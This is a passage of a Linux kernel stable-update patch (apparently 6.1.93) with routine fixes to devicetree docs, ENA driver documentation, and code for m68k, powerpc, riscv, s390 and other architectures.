++                     GPIO_6, GPIO_7, GPIO_8, UART0_TXD, UART0_RXD, TOP_2G_CLK,
++                     TOP_2G_DATA, WF0_2G_HB0, WF0_2G_HB1, WF0_2G_HB2, WF0_2G_HB3,
++                     WF0_2G_HB4, WF0_2G_HB5, WF0_2G_HB6]
+ 
+           bias-disable: true
+ 
+diff --git a/Documentation/devicetree/bindings/soc/rockchip/grf.yaml b/Documentation/devicetree/bindings/soc/rockchip/grf.yaml
+index 2ed8cca79b59c..e4eade2661f6b 100644
+--- a/Documentation/devicetree/bindings/soc/rockchip/grf.yaml
++++ b/Documentation/devicetree/bindings/soc/rockchip/grf.yaml
+@@ -151,6 +151,7 @@ allOf:
+           unevaluatedProperties: false
+ 
+         pcie-phy:
++          type: object
+           description:
+             Documentation/devicetree/bindings/phy/rockchip-pcie-phy.txt
+ 
+diff --git a/Documentation/devicetree/bindings/sound/rt5645.txt b/Documentation/devicetree/bindings/sound/rt5645.txt
+index 41a62fd2ae1ff..c1fa379f5f3ea 100644
+--- a/Documentation/devicetree/bindings/sound/rt5645.txt
++++ b/Documentation/devicetree/bindings/sound/rt5645.txt
+@@ -20,6 +20,11 @@ Optional properties:
+   a GPIO spec for the external headphone detect pin. If jd-mode = 0,
+   we will get the JD status by getting the value of hp-detect-gpios.
+ 
++- cbj-sleeve-gpios:
++  a GPIO spec to control the external combo jack circuit to tie the sleeve/ring2
++  contacts to the ground or floating. It could avoid some electric noise from the
++  active speaker jacks.
++
+ - realtek,in2-differential
+   Boolean. Indicate MIC2 input are differential, rather than single-ended.
+ 
+@@ -68,6 +73,7 @@ codec: rt5650@1a {
+ 	compatible = "realtek,rt5650";
+ 	reg = <0x1a>;
+ 	hp-detect-gpios = <&gpio 19 0>;
++	cbj-sleeve-gpios = <&gpio 20 0>;
+ 	interrupt-parent = <&gpio>;
+ 	interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
+ 	realtek,dmic-en = "true";
+diff --git a/Documentation/driver-api/fpga/fpga-region.rst b/Documentation/driver-api/fpga/fpga-region.rst
+index dc55d60a0b4a5..2d03b5fb76575 100644
+--- a/Documentation/driver-api/fpga/fpga-region.rst
++++ b/Documentation/driver-api/fpga/fpga-region.rst
+@@ -46,13 +46,16 @@ API to add a new FPGA region
+ ----------------------------
+ 
+ * struct fpga_region - The FPGA region struct
+-* struct fpga_region_info - Parameter structure for fpga_region_register_full()
+-* fpga_region_register_full() -  Create and register an FPGA region using the
++* struct fpga_region_info - Parameter structure for __fpga_region_register_full()
++* __fpga_region_register_full() -  Create and register an FPGA region using the
+   fpga_region_info structure to provide the full flexibility of options
+-* fpga_region_register() -  Create and register an FPGA region using standard
++* __fpga_region_register() -  Create and register an FPGA region using standard
+   arguments
+ * fpga_region_unregister() -  Unregister an FPGA region
+ 
++Helper macros ``fpga_region_register()`` and ``fpga_region_register_full()``
++automatically set the module that registers the FPGA region as the owner.
++
+ The FPGA region's probe function will need to get a reference to the FPGA
+ Manager it will be using to do the programming.  This usually would happen
+ during the region's probe function.
+@@ -82,10 +85,10 @@ following APIs to handle building or tearing down that list.
+    :functions: fpga_region_info
+ 
+ .. kernel-doc:: drivers/fpga/fpga-region.c
+-   :functions: fpga_region_register_full
++   :functions: __fpga_region_register_full
+ 
+ .. kernel-doc:: drivers/fpga/fpga-region.c
+-   :functions: fpga_region_register
++   :functions: __fpga_region_register
+ 
+ .. kernel-doc:: drivers/fpga/fpga-region.c
+    :functions: fpga_region_unregister
+diff --git a/Documentation/networking/device_drivers/ethernet/amazon/ena.rst b/Documentation/networking/device_drivers/ethernet/amazon/ena.rst
+index 8bcb173e0353f..4914926776326 100644
+--- a/Documentation/networking/device_drivers/ethernet/amazon/ena.rst
++++ b/Documentation/networking/device_drivers/ethernet/amazon/ena.rst
+@@ -205,6 +205,7 @@ Adaptive coalescing can be switched on/off through `ethtool(8)`'s
+ More information about Adaptive Interrupt Moderation (DIM) can be found in
+ Documentation/networking/net_dim.rst
+ 
++.. _`RX copybreak`:
+ RX copybreak
+ ============
+ The rx_copybreak is initialized by default to ENA_DEFAULT_RX_COPYBREAK
+@@ -315,3 +316,34 @@ Rx
+ - The new SKB is updated with the necessary information (protocol,
+   checksum hw verify result, etc), and then passed to the network
+   stack, using the NAPI interface function :code:`napi_gro_receive()`.
++
++Dynamic RX Buffers (DRB)
++------------------------
++
++Each RX descriptor in the RX ring is a single memory page (which is either 4KB
++or 16KB long depending on system's configurations).
++To reduce the memory allocations required when dealing with a high rate of small
++packets, the driver tries to reuse the remaining RX descriptor's space if more
++than 2KB of this page remain unused.
++
++A simple example of this mechanism is the following sequence of events:
++
++::
++
++        1. Driver allocates page-sized RX buffer and passes it to hardware
++                +----------------------+
++                |4KB RX Buffer         |
++                +----------------------+
++
++        2. A 300Bytes packet is received on this buffer
++
++        3. The driver increases the ref count on this page and returns it back to
++           HW as an RX buffer of size 4KB - 300Bytes = 3796 Bytes
++               +----+--------------------+
++               |****|3796 Bytes RX Buffer|
++               +----+--------------------+
++
++This mechanism isn't used when an XDP program is loaded, or when the
++RX packet is less than rx_copybreak bytes (in which case the packet is
++copied out of the RX buffer into the linear part of a new skb allocated
++for it and the RX buffer remains the same size, see `RX copybreak`_).
+diff --git a/Makefile b/Makefile
+index 0be668057cb2a..c5147f1c46f87 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 92
++SUBLEVEL = 93
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/configs/sunxi_defconfig b/arch/arm/configs/sunxi_defconfig
+index bddc82f789421..a83d29fed1756 100644
+--- a/arch/arm/configs/sunxi_defconfig
++++ b/arch/arm/configs/sunxi_defconfig
+@@ -110,6 +110,7 @@ CONFIG_DRM_PANEL_LVDS=y
+ CONFIG_DRM_PANEL_SIMPLE=y
+ CONFIG_DRM_PANEL_EDP=y
+ CONFIG_DRM_SIMPLE_BRIDGE=y
++CONFIG_DRM_DW_HDMI=y
+ CONFIG_DRM_LIMA=y
+ CONFIG_FB_SIMPLE=y
+ CONFIG_BACKLIGHT_CLASS_DEVICE=y
+diff --git a/arch/arm64/boot/dts/amlogic/meson-s4.dtsi b/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
+index 372a03762d69b..a1c55b047708c 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-s4.dtsi
+@@ -61,10 +61,15 @@ xtal: xtal-clk {
+ 		#clock-cells = <0>;
+ 	};
+ 
+-	pwrc: power-controller {
+-		compatible = "amlogic,meson-s4-pwrc";
+-		#power-domain-cells = <1>;
+-		status = "okay";
++	firmware {
++		sm: secure-monitor {
++			compatible = "amlogic,meson-gxbb-sm";
++
++			pwrc: power-controller {
++				compatible = "amlogic,meson-s4-pwrc";
++				#power-domain-cells = <1>;
++			};
++		};
+ 	};
+ 
+ 	soc {
+diff --git a/arch/arm64/include/asm/asm-bug.h b/arch/arm64/include/asm/asm-bug.h
+index c762038ba4009..6e73809f6492a 100644
+--- a/arch/arm64/include/asm/asm-bug.h
++++ b/arch/arm64/include/asm/asm-bug.h
+@@ -28,6 +28,7 @@
+ 	14470:	.long 14471f - .;			\
+ _BUGVERBOSE_LOCATION(__FILE__, __LINE__)		\
+ 		.short flags; 				\
++		.align 2;				\
+ 		.popsection;				\
+ 	14471:
+ #else
+diff --git a/arch/loongarch/include/asm/perf_event.h b/arch/loongarch/include/asm/perf_event.h
+index 52b638059e40b..f948a0676daf8 100644
+--- a/arch/loongarch/include/asm/perf_event.h
++++ b/arch/loongarch/include/asm/perf_event.h
+@@ -13,8 +13,7 @@
+ 
+ #define perf_arch_fetch_caller_regs(regs, __ip) { \
+ 	(regs)->csr_era = (__ip); \
+-	(regs)->regs[3] = current_stack_pointer; \
+-	(regs)->regs[22] = (unsigned long) __builtin_frame_address(0); \
++	(regs)->regs[3] = (unsigned long) __builtin_frame_address(0); \
+ }
+ 
+ #endif /* __LOONGARCH_PERF_EVENT_H__ */
+diff --git a/arch/loongarch/kernel/perf_event.c b/arch/loongarch/kernel/perf_event.c
+index 3a2edb157b65a..1563bf47f3e2c 100644
+--- a/arch/loongarch/kernel/perf_event.c
++++ b/arch/loongarch/kernel/perf_event.c
+@@ -884,4 +884,4 @@ static int __init init_hw_perf_events(void)
+ 
+ 	return 0;
+ }
+-early_initcall(init_hw_perf_events);
++pure_initcall(init_hw_perf_events);
+diff --git a/arch/m68k/kernel/entry.S b/arch/m68k/kernel/entry.S
+index 42879e6eb651d..1219318304b26 100644
+--- a/arch/m68k/kernel/entry.S
++++ b/arch/m68k/kernel/entry.S
+@@ -430,7 +430,9 @@ resume:
+ 	movec	%a0,%dfc
+ 
+ 	/* restore status register */
+-	movew	%a1@(TASK_THREAD+THREAD_SR),%sr
++	movew	%a1@(TASK_THREAD+THREAD_SR),%d0
++	oriw	#0x0700,%d0
++	movew	%d0,%sr
+ 
+ 	rts
+ 
+diff --git a/arch/m68k/mac/misc.c b/arch/m68k/mac/misc.c
+index 4fab347917586..060394b00037d 100644
+--- a/arch/m68k/mac/misc.c
++++ b/arch/m68k/mac/misc.c
+@@ -451,30 +451,18 @@ void mac_poweroff(void)
+ 
+ void mac_reset(void)
+ {
+-	if (macintosh_config->adb_type == MAC_ADB_II &&
+-	    macintosh_config->ident != MAC_MODEL_SE30) {
+-		/* need ROMBASE in booter */
+-		/* indeed, plus need to MAP THE ROM !! */
+-
+-		if (mac_bi_data.rombase == 0)
+-			mac_bi_data.rombase = 0x40800000;
+-
+-		/* works on some */
+-		rom_reset = (void *) (mac_bi_data.rombase + 0xa);
+-
+-		local_irq_disable();
+-		rom_reset();
+ #ifdef CONFIG_ADB_CUDA
+-	} else if (macintosh_config->adb_type == MAC_ADB_EGRET ||
+-	           macintosh_config->adb_type == MAC_ADB_CUDA) {
++	if (macintosh_config->adb_type == MAC_ADB_EGRET ||
++	    macintosh_config->adb_type == MAC_ADB_CUDA) {
+ 		cuda_restart();
++	} else
+ #endif
+ #ifdef CONFIG_ADB_PMU
+-	} else if (macintosh_config->adb_type == MAC_ADB_PB2) {
++	if (macintosh_config->adb_type == MAC_ADB_PB2) {
+ 		pmu_restart();
++	} else
+ #endif
+-	} else if (CPU_IS_030) {
+-
++	if (CPU_IS_030) {
+ 		/* 030-specific reset routine.  The idea is general, but the
+ 		 * specific registers to reset are '030-specific.  Until I
+ 		 * have a non-030 machine, I can't test anything else.
+@@ -522,6 +510,18 @@ void mac_reset(void)
+ 		    "jmp %/a0@\n\t" /* jump to the reset vector */
+ 		    ".chip 68k"
+ 		    : : "r" (offset), "a" (rombase) : "a0");
++	} else {
++		/* need ROMBASE in booter */
++		/* indeed, plus need to MAP THE ROM !! */
++
++		if (mac_bi_data.rombase == 0)
++			mac_bi_data.rombase = 0x40800000;
++
++		/* works on some */
++		rom_reset = (void *)(mac_bi_data.rombase + 0xa);
++
++		local_irq_disable();
++		rom_reset();
+ 	}
+ 
+ 	/* should never get here */
+diff --git a/arch/microblaze/kernel/Makefile b/arch/microblaze/kernel/Makefile
+index 4393bee64eaf8..85c4d29ef43e9 100644
+--- a/arch/microblaze/kernel/Makefile
++++ b/arch/microblaze/kernel/Makefile
+@@ -7,7 +7,6 @@ ifdef CONFIG_FUNCTION_TRACER
+ # Do not trace early boot code and low level code
+ CFLAGS_REMOVE_timer.o = -pg
+ CFLAGS_REMOVE_intc.o = -pg
+-CFLAGS_REMOVE_early_printk.o = -pg
+ CFLAGS_REMOVE_ftrace.o = -pg
+ CFLAGS_REMOVE_process.o = -pg
+ endif
+diff --git a/arch/microblaze/kernel/cpu/cpuinfo-static.c b/arch/microblaze/kernel/cpu/cpuinfo-static.c
+index 85dbda4a08a81..03da36dc6d9c9 100644
+--- a/arch/microblaze/kernel/cpu/cpuinfo-static.c
++++ b/arch/microblaze/kernel/cpu/cpuinfo-static.c
+@@ -18,7 +18,7 @@ static const char family_string[] = CONFIG_XILINX_MICROBLAZE0_FAMILY;
+ static const char cpu_ver_string[] = CONFIG_XILINX_MICROBLAZE0_HW_VER;
+ 
+ #define err_printk(x) \
+-	early_printk("ERROR: Microblaze " x "-different for kernel and DTS\n");
++	pr_err("ERROR: Microblaze " x "-different for kernel and DTS\n");
+ 
+ void __init set_cpuinfo_static(struct cpuinfo *ci, struct device_node *cpu)
+ {
+diff --git a/arch/parisc/kernel/parisc_ksyms.c b/arch/parisc/kernel/parisc_ksyms.c
+index 00297e8e1c888..317508493b81c 100644
+--- a/arch/parisc/kernel/parisc_ksyms.c
++++ b/arch/parisc/kernel/parisc_ksyms.c
+@@ -21,6 +21,7 @@ EXPORT_SYMBOL(memset);
+ #include <linux/atomic.h>
+ EXPORT_SYMBOL(__xchg8);
+ EXPORT_SYMBOL(__xchg32);
++EXPORT_SYMBOL(__cmpxchg_u8);
+ EXPORT_SYMBOL(__cmpxchg_u32);
+ EXPORT_SYMBOL(__cmpxchg_u64);
+ #ifdef CONFIG_SMP
+diff --git a/arch/powerpc/include/asm/hvcall.h b/arch/powerpc/include/asm/hvcall.h
+index 95fd7f9485d55..47bc10cdb70b5 100644
+--- a/arch/powerpc/include/asm/hvcall.h
++++ b/arch/powerpc/include/asm/hvcall.h
+@@ -539,7 +539,7 @@ struct hvcall_mpp_data {
+ 	unsigned long backing_mem;
+ };
+ 
+-int h_get_mpp(struct hvcall_mpp_data *);
++long h_get_mpp(struct hvcall_mpp_data *mpp_data);
+ 
+ struct hvcall_mpp_x_data {
+ 	unsigned long coalesced_bytes;
+diff --git a/arch/powerpc/platforms/pseries/lpar.c b/arch/powerpc/platforms/pseries/lpar.c
+index 5186d65d772e2..29d235b02f062 100644
+--- a/arch/powerpc/platforms/pseries/lpar.c
++++ b/arch/powerpc/platforms/pseries/lpar.c
+@@ -1904,10 +1904,10 @@ notrace void __trace_hcall_exit(long opcode, long retval, unsigned long *retbuf)
+  * h_get_mpp
+  * H_GET_MPP hcall returns info in 7 parms
+  */
+-int h_get_mpp(struct hvcall_mpp_data *mpp_data)
++long h_get_mpp(struct hvcall_mpp_data *mpp_data)
+ {
+-	int rc;
+-	unsigned long retbuf[PLPAR_HCALL9_BUFSIZE];
++	unsigned long retbuf[PLPAR_HCALL9_BUFSIZE] = {0};
++	long rc;
+ 
+ 	rc = plpar_hcall9(H_GET_MPP, retbuf);
+ 
+diff --git a/arch/powerpc/platforms/pseries/lparcfg.c b/arch/powerpc/platforms/pseries/lparcfg.c
+index ca10a3682c46e..a6f2d71831cc1 100644
+--- a/arch/powerpc/platforms/pseries/lparcfg.c
++++ b/arch/powerpc/platforms/pseries/lparcfg.c
+@@ -112,8 +112,8 @@ struct hvcall_ppp_data {
+  */
+ static unsigned int h_get_ppp(struct hvcall_ppp_data *ppp_data)
+ {
+-	unsigned long rc;
+-	unsigned long retbuf[PLPAR_HCALL9_BUFSIZE];
++	unsigned long retbuf[PLPAR_HCALL9_BUFSIZE] = {0};
++	long rc;
+ 
+ 	rc = plpar_hcall9(H_GET_PPP, retbuf);
+ 
+@@ -192,7 +192,7 @@ static void parse_ppp_data(struct seq_file *m)
+ 	struct hvcall_ppp_data ppp_data;
+ 	struct device_node *root;
+ 	const __be32 *perf_level;
+-	int rc;
++	long rc;
+ 
+ 	rc = h_get_ppp(&ppp_data);
+ 	if (rc)
+@@ -393,8 +393,8 @@ static int read_dt_lpar_name(struct seq_file *m)
+ 
+ static void read_lpar_name(struct seq_file *m)
+ {
+-	if (read_rtas_lpar_name(m) && read_dt_lpar_name(m))
+-		pr_err_once("Error can't get the LPAR name");
++	if (read_rtas_lpar_name(m))
++		read_dt_lpar_name(m);
+ }
+ 
+ #define SPLPAR_CHARACTERISTICS_TOKEN 20
+diff --git a/arch/powerpc/sysdev/fsl_msi.c b/arch/powerpc/sysdev/fsl_msi.c
+index 73c2d70706c0a..e50445c2656ac 100644
+--- a/arch/powerpc/sysdev/fsl_msi.c
++++ b/arch/powerpc/sysdev/fsl_msi.c
+@@ -567,10 +567,12 @@ static const struct fsl_msi_feature ipic_msi_feature = {
+ 	.msiir_offset = 0x38,
+ };
+ 
++#ifdef CONFIG_EPAPR_PARAVIRT
+ static const struct fsl_msi_feature vmpic_msi_feature = {
+ 	.fsl_pic_ip = FSL_PIC_IP_VMPIC,
+ 	.msiir_offset = 0,
+ };
++#endif
+ 
+ static const struct of_device_id fsl_of_msi_ids[] = {
+ 	{
+diff --git a/arch/riscv/kernel/cpu_ops_sbi.c b/arch/riscv/kernel/cpu_ops_sbi.c
+index efa0f0816634c..93cbc38d18057 100644
+--- a/arch/riscv/kernel/cpu_ops_sbi.c
++++ b/arch/riscv/kernel/cpu_ops_sbi.c
+@@ -72,7 +72,7 @@ static int sbi_cpu_start(unsigned int cpuid, struct task_struct *tidle)
+ 	/* Make sure tidle is updated */
+ 	smp_mb();
+ 	bdata->task_ptr = tidle;
+-	bdata->stack_ptr = task_stack_page(tidle) + THREAD_SIZE;
++	bdata->stack_ptr = task_pt_regs(tidle);
+ 	/* Make sure boot data is updated */
+ 	smp_mb();
+ 	hsm_data = __pa(bdata);
+diff --git a/arch/riscv/kernel/cpu_ops_spinwait.c b/arch/riscv/kernel/cpu_ops_spinwait.c
+index d98d19226b5f5..691e0c5366d2b 100644
+--- a/arch/riscv/kernel/cpu_ops_spinwait.c
++++ b/arch/riscv/kernel/cpu_ops_spinwait.c
+@@ -34,8 +34,7 @@ static void cpu_update_secondary_bootdata(unsigned int cpuid,
+ 
+ 	/* Make sure tidle is updated */
+ 	smp_mb();
+-	WRITE_ONCE(__cpu_spinwait_stack_pointer[hartid],
+-		   task_stack_page(tidle) + THREAD_SIZE);
++	WRITE_ONCE(__cpu_spinwait_stack_pointer[hartid], task_pt_regs(tidle));
+ 	WRITE_ONCE(__cpu_spinwait_task_pointer[hartid], tidle);
+ }
+ 
+diff --git a/arch/riscv/kernel/entry.S b/arch/riscv/kernel/entry.S
+index 3221a9e5f3724..99d38fdf8b18f 100644
+--- a/arch/riscv/kernel/entry.S
++++ b/arch/riscv/kernel/entry.S
+@@ -248,7 +248,7 @@ ret_from_syscall_rejected:
+ 	andi t0, t0, _TIF_SYSCALL_WORK
+ 	bnez t0, handle_syscall_trace_exit
+ 
+-ret_from_exception:
++SYM_CODE_START_NOALIGN(ret_from_exception)
+ 	REG_L s0, PT_STATUS(sp)
+ 	csrc CSR_STATUS, SR_IE
+ #ifdef CONFIG_TRACE_IRQFLAGS
+@@ -262,6 +262,7 @@ ret_from_exception:
+ 	andi s0, s0, SR_SPP
+ #endif
+ 	bnez s0, resume_kernel
++SYM_CODE_END(ret_from_exception)
+ 
+ 	/* Interrupts must be disabled here so flags are checked atomically */
+ 	REG_L s0, TASK_TI_FLAGS(tp) /* current_thread_info->flags */
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index 17d7383f201a5..528ec7cc9a622 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -16,6 +16,18 @@
+ 
+ #ifdef CONFIG_FRAME_POINTER
+ 
++extern asmlinkage void ret_from_exception(void);
++
++static inline int fp_is_valid(unsigned long fp, unsigned long sp)
++{
++	unsigned long low, high;
++
++	low = sp + sizeof(struct stackframe);
++	high = ALIGN(sp, THREAD_SIZE);
++
++	return !(fp < low || fp > high || fp & 0x07);
++}
++
+ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 			     bool (*fn)(void *, unsigned long), void *arg)
+ {
+@@ -39,27 +51,32 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 	}
+ 
+ 	for (;;) {
+-		unsigned long low, high;
+ 		struct stackframe *frame;
+ 
+ 		if (unlikely(!__kernel_text_address(pc) || (level++ >= 0 && !fn(arg, pc))))
+ 			break;
+ 
+-		/* Validate frame pointer */
+-		low = sp + sizeof(struct stackframe);
+-		high = ALIGN(sp, THREAD_SIZE);
+-		if (unlikely(fp < low || fp > high || fp & 0x7))
++		if (unlikely(!fp_is_valid(fp, sp)))
+ 			break;
++
+ 		/* Unwind stack frame */
+ 		frame = (struct stackframe *)fp - 1;
+ 		sp = fp;
+-		if (regs && (regs->epc == pc) && (frame->fp & 0x7)) {
++		if (regs && (regs->epc == pc) && fp_is_valid(frame->ra, sp)) {
++			/* We hit function where ra is not saved on the stack */
+ 			fp = frame->ra;
+ 			pc = regs->ra;
+ 		} else {
+ 			fp = frame->fp;
+ 			pc = ftrace_graph_ret_addr(current, NULL, frame->ra,
+ 						   &frame->ra);
++			if (pc == (unsigned long)ret_from_exception) {
++				if (unlikely(!__kernel_text_address(pc) || !fn(arg, pc)))
++					break;
++
++				pc = ((struct pt_regs *)sp)->epc;
++				fp = ((struct pt_regs *)sp)->s0;
++			}
+ 		}
+ 
+ 	}
+diff --git a/arch/riscv/net/bpf_jit_comp64.c b/arch/riscv/net/bpf_jit_comp64.c
+index 8f5d3c57d58ad..4c4ac563326b5 100644
+--- a/arch/riscv/net/bpf_jit_comp64.c
++++ b/arch/riscv/net/bpf_jit_comp64.c
+@@ -503,33 +503,33 @@ static void emit_atomic(u8 rd, u8 rs, s16 off, s32 imm, bool is64,
+ 		break;
+ 	/* src_reg = atomic_fetch_<op>(dst_reg + off16, src_reg) */
+ 	case BPF_ADD | BPF_FETCH:
+-		emit(is64 ? rv_amoadd_d(rs, rs, rd, 0, 0) :
+-		     rv_amoadd_w(rs, rs, rd, 0, 0), ctx);
++		emit(is64 ? rv_amoadd_d(rs, rs, rd, 1, 1) :
++		     rv_amoadd_w(rs, rs, rd, 1, 1), ctx);
+ 		if (!is64)
+ 			emit_zext_32(rs, ctx);
+ 		break;
+ 	case BPF_AND | BPF_FETCH:
+-		emit(is64 ? rv_amoand_d(rs, rs, rd, 0, 0) :
+-		     rv_amoand_w(rs, rs, rd, 0, 0), ctx);
++		emit(is64 ? rv_amoand_d(rs, rs, rd, 1, 1) :
++		     rv_amoand_w(rs, rs, rd, 1, 1), ctx);
+ 		if (!is64)
+ 			emit_zext_32(rs, ctx);
+ 		break;
+ 	case BPF_OR | BPF_FETCH:
+-		emit(is64 ? rv_amoor_d(rs, rs, rd, 0, 0) :
+-		     rv_amoor_w(rs, rs, rd, 0, 0), ctx);
++		emit(is64 ? rv_amoor_d(rs, rs, rd, 1, 1) :
++		     rv_amoor_w(rs, rs, rd, 1, 1), ctx);
+ 		if (!is64)
+ 			emit_zext_32(rs, ctx);
+ 		break;
+ 	case BPF_XOR | BPF_FETCH:
+-		emit(is64 ? rv_amoxor_d(rs, rs, rd, 0, 0) :
+-		     rv_amoxor_w(rs, rs, rd, 0, 0), ctx);
++		emit(is64 ? rv_amoxor_d(rs, rs, rd, 1, 1) :
++		     rv_amoxor_w(rs, rs, rd, 1, 1), ctx);
+ 		if (!is64)
+ 			emit_zext_32(rs, ctx);
+ 		break;
+ 	/* src_reg = atomic_xchg(dst_reg + off16, src_reg); */
+ 	case BPF_XCHG:
+-		emit(is64 ? rv_amoswap_d(rs, rs, rd, 0, 0) :
+-		     rv_amoswap_w(rs, rs, rd, 0, 0), ctx);
++		emit(is64 ? rv_amoswap_d(rs, rs, rd, 1, 1) :
++		     rv_amoswap_w(rs, rs, rd, 1, 1), ctx);
+ 		if (!is64)
+ 			emit_zext_32(rs, ctx);
+ 		break;
+diff --git a/arch/s390/boot/startup.c b/arch/s390/boot/startup.c
+index e0863d28759a5..bfb4dec36414a 100644
+--- a/arch/s390/boot/startup.c
++++ b/arch/s390/boot/startup.c
+@@ -30,7 +30,6 @@ int __bootdata(is_full_image) = 1;
+ struct initrd_data __bootdata(initrd_data);
+ 
+ u64 __bootdata_preserved(stfle_fac_list[16]);
+-u64 __bootdata_preserved(alt_stfle_fac_list[16]);
+ struct oldmem_data __bootdata_preserved(oldmem_data);
+ 
+ void error(char *x)
+diff --git a/arch/s390/kernel/ipl.c b/arch/s390/kernel/ipl.c
+index df5d2ec737d80..3aa3fff9bde0c 100644
+--- a/arch/s390/kernel/ipl.c
++++ b/arch/s390/kernel/ipl.c
+@@ -834,8 +834,8 @@ static ssize_t reipl_nvme_scpdata_write(struct file *filp, struct kobject *kobj,
+ 		scpdata_len += padding;
+ 	}
+ 
+-	reipl_block_nvme->hdr.len = IPL_BP_FCP_LEN + scpdata_len;
+-	reipl_block_nvme->nvme.len = IPL_BP0_FCP_LEN + scpdata_len;
++	reipl_block_nvme->hdr.len = IPL_BP_NVME_LEN + scpdata_len;
++	reipl_block_nvme->nvme.len = IPL_BP0_NVME_LEN + scpdata_len;
+ 	reipl_block_nvme->nvme.scp_data_len = scpdata_len;
+ 
+ 	return count;
+@@ -1604,9 +1604,9 @@ static int __init dump_nvme_init(void)
+ 	}
+ 	dump_block_nvme->hdr.len = IPL_BP_NVME_LEN;
+ 	dump_block_nvme->hdr.version = IPL_PARM_BLOCK_VERSION;
+-	dump_block_nvme->fcp.len = IPL_BP0_NVME_LEN;
+-	dump_block_nvme->fcp.pbt = IPL_PBT_NVME;
+-	dump_block_nvme->fcp.opt = IPL_PB0_NVME_OPT_DUMP;
++	dump_block_nvme->nvme.len = IPL_BP0_NVME_LEN;
++	dump_block_nvme->nvme.pbt = IPL_PBT_NVME;
++	dump_block_nvme->nvme.opt = IPL_PB0_NVME_OPT_DUMP;
+ 	dump_capabilities |= DUMP_TYPE_NVME;
+ 	return 0;
+ }
+diff --git a/arch/s390/kernel/setup.c b/arch/s390/kernel/setup.c
+index 2ec5f1e0312fa..1f514557fee9d 100644
+--- a/arch/s390/kernel/setup.c
++++ b/arch/s390/kernel/setup.c
+@@ -155,7 +155,7 @@ unsigned int __bootdata_preserved(zlib_dfltcc_support);
+ EXPORT_SYMBOL(zlib_dfltcc_support);
+ u64 __bootdata_preserved(stfle_fac_list[16]);
+ EXPORT_SYMBOL(stfle_fac_list);
+-u64 __bootdata_preserved(alt_stfle_fac_list[16]);
++u64 alt_stfle_fac_list[16];
+ struct oldmem_data __bootdata_preserved(oldmem_data);
+ 
+ unsigned long VMALLOC_START;
+diff --git a/arch/s390/kernel/vdso32/Makefile b/arch/s390/kernel/vdso32/Makefile
+index cc513add48eb5..6056f2ae02632 100644
+--- a/arch/s390/kernel/vdso32/Makefile
++++ b/arch/s390/kernel/vdso32/Makefile
+@@ -20,7 +20,10 @@ KBUILD_AFLAGS_32 := $(filter-out -m64,$(KBUILD_AFLAGS))
+ KBUILD_AFLAGS_32 += -m31 -s
+ 
+ KBUILD_CFLAGS_32 := $(filter-out -m64,$(KBUILD_CFLAGS))
+-KBUILD_CFLAGS_32 += -m31 -fPIC -shared -fno-common -fno-builtin
++KBUILD_CFLAGS_32 := $(filter-out -mpacked-stack,$(KBUILD_CFLAGS))
++KBUILD_CFLAGS_32 := $(filter-out -mno-pic-data-is-text-relative,$(KBUILD_CFLAGS_32))
++KBUILD_CFLAGS_32 := $(filter-out -fno-asynchronous-unwind-tables,$(KBUILD_CFLAGS_32))
++KBUILD_CFLAGS_32 += -m31 -fPIC -shared -fno-common -fno-builtin -fasynchronous-unwind-tables
+ 
+ LDFLAGS_vdso32.so.dbg += -shared -soname=linux-vdso32.so.1 \
+ 	--hash-style=both --build-id=sha1 -melf_s390 -T
+diff --git a/arch/s390/kernel/vdso64/Makefile b/arch/s390/kernel/vdso64/Makefile
+index 42d918d50a1ff..498d56757c4dc 100644
+--- a/arch/s390/kernel/vdso64/Makefile
++++ b/arch/s390/kernel/vdso64/Makefile
+@@ -25,7 +25,11 @@ KBUILD_AFLAGS_64 := $(filter-out -m64,$(KBUILD_AFLAGS))
+ KBUILD_AFLAGS_64 += -m64 -s
+ 
+ KBUILD_CFLAGS_64 := $(filter-out -m64,$(KBUILD_CFLAGS))
+-KBUILD_CFLAGS_64 += -m64 -fPIC -fno-common -fno-builtin
++KBUILD_CFLAGS_64 := $(filter-out -mpacked-stack,$(KBUILD_CFLAGS_64))
++KBUILD_CFLAGS_64 := $(filter-out -mno-pic-data-is-text-relative,$(KBUILD_CFLAGS_64))
++KBUILD_CFLAGS_64 := $(filter-out -munaligned-symbols,$(KBUILD_CFLAGS_64))
++KBUILD_CFLAGS_64 := $(filter-out -fno-asynchronous-unwind-tables,$(KBUILD_CFLAGS_64))
++KBUILD_CFLAGS_64 += -m64 -fPIC -fno-common -fno-builtin -fasynchronous-unwind-tables
+ ldflags-y := -shared -soname=linux-vdso64.so.1 \
+ 	     --hash-style=both --build-id=sha1 -T
+ 
+diff --git a/arch/s390/net/bpf_jit_comp.c b/arch/s390/net/bpf_jit_comp.c
+index fbdba4c306bea..8623863935576 100644
+--- a/arch/s390/net/bpf_jit_comp.c
++++ b/arch/s390/net/bpf_jit_comp.c
+@@ -1207,8 +1207,12 @@ static noinline int bpf_jit_insn(struct bpf_jit *jit, struct bpf_prog *fp,
+ 	EMIT6_DISP_LH(0xeb000000, is32 ? (op32) : (op64),		\
+ 		      (insn->imm & BPF_FETCH) ? src_reg : REG_W0,	\
+ 		      src_reg, dst_reg, off);				\
+-	if (is32 && (insn->imm & BPF_FETCH))				\
+-		EMIT_ZERO(src_reg);					\
++	if (insn->imm & BPF_FETCH) {					\
++		/* bcr 14,0 - see atomic_fetch_{add,and,or,xor}() */	\
++		_EMIT2(0x07e0);						\
++		if (is32)                                               \
++			EMIT_ZERO(src_reg);				\
++	}								\
+ } while (0)
+ 		case BPF_ADD:
+ 		case BPF_ADD | BPF_FETCH:
+diff --git a/arch/sh/kernel/kprobes.c b/arch/sh/kernel/kprobes.c
+index aed1ea8e2c2f0..74051b8ddf3e7 100644
+--- a/arch/sh/kernel/kprobes.c
